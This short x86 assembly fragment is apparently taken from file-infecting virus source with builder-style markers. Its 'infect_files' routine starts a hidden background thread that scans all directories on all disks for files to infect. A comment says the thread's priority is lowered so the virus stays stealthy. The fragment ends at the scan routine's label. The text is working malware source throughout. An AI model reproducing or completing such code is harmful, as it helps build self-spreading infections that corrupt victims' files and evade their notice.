;%%%7 0 BSCN Infect files in background

;###CreateThread
;###SetThreadPriority
infect_files:

;search for file to infect

	pushad

	call delta

;setup parameter for a later call to SetThreadPriority

	push -2

;create a new thread, that will search for files in all disks

	sub eax,eax
	push eax
	push esp
	push eax
	push eax
	call @@scanner
	call scan_thread
	ret 4
  @@scanner:
	push eax
	push eax
	call [ebp+_CreateThread]

;set a low priority to the thread, so its more stealth

	mov [esp],eax
	call [ebp+_SetThreadPriority]

	popad
	ret


;scan for all files in all directories of all disks

scan_thread:
@@;$$$RSCN
